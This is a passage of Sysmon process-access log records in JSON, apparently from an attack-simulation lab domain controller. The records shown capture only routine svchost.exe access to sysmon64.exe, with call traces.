C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 